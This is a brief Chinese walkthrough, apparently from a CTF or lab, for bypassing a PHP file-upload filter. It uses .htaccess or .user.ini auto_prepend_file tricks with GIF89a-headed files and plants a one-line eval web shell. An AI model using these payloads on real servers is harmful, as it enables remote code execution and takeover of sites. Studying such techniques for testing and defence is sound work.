知识点
1.user.int绕过限制
步骤
1.直接抓包,先测是上传限制。(上传png等文件时记得加上GIF89a文件头)
php文件被禁止上传,尝试上传.htaccess文件,用来解析png文件中的php代码,结果发现.htaccess中的内容被限制了。如下内容:
方法一:
<FilesMatch "4.png">
SetHandler application/x-httpd-php
</FilesMatch>
方法二:
AddType application/x-httpd-php .png在此处需要使用.user.ini,这个文件的作用和.htaccess差不多,都是使一个文件能够被执行。
.user.ini文件内容:(使1.png能够被当做php执行)
GIF89a
auto_prepend_file=1.png
然后再上传png文件,里面写上一句话木马,这里上传png文件时,不能包含php字样,所以采用另外一种一句话木马
1.png文件内容:(注意这里不要有空格不然会连接不上)
GIF89a
<?=eval($_POST['cmd']);?>
2.连接
